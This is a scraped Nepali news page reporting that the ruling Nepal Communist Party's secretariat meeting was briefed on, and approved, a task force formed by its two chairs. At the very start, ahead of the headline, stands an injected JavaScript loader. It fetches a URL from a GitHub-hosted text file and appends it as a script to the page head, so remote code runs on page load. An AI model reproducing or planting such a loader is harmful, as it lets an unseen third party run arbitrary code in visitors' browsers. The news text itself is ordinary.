;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेकपा सचिवालय बैठक अध्यक्षद्वयले गठन गरेको कार्यदलको बारेमा जानकारी दिएर सकियो – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • नेकपा सचिवालय बैठक अध्यक्षद्वयले गठन गरेको कार्यदलको बारेमा जानकारी दिएर सकियो
राजनीति

नेकपा सचिवालय बैठक अध्यक्षद्वयले गठन गरेको कार्यदलको बारेमा जानकारी दिएर सकियो


भदौ १,

झण्डै एक महिनापछि सत्तारूढ नेपाल कम्युनिष्ट पार्टीको सचिवालय बैठक सम्पन्न भएको छ । आजको बौठकमा अध्यक्षद्वयले गठन गरेको कार्यदलको बारेमा बैठकमा जानकारी गराइएको छ ।

कार्यदललाई बैठकले बधाई ज्ञापन र अनुमोदन गरेको  प्रधानमन्त्रीका प्रेस सल्लाहकार एवं नेकपाका प्रचार विभागका उपप्रमुख सूर्य थापाले जानकारी दिए । उनका अनुसार कार्यदलले प्रतिवेदन अध्यक्षद्वयसमक्ष प्रस्तुत गर्ने र  बैठकमा ल्याउने बताइएको छ ।file Photo

फेसबुक प्रतिक्रियाहरु